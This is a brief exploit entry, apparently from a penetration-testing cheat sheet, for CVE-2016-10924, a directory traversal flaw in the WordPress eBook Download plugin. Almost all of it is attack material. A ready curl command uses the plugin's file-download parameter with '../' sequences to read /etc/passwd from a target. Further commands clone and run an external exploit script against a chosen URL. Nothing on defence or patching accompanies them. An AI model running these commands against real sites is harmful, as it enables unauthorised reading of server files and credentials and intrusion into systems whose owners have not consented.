Wordpress eBook Download < 1.2 - CVE-2016-10924

Brief

There is a directory traversal vulnerability in Wordpress eBook Download < 1.2, which allow remote attackers to read arbitrary files.

curl http://$target/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../etc/passwd

git clone https://github.com/rvizx/CVE-2016-10924
cd CVE-2016-10924
python pidbrute.py $url

Last updated 2 years ago

Was this helpful?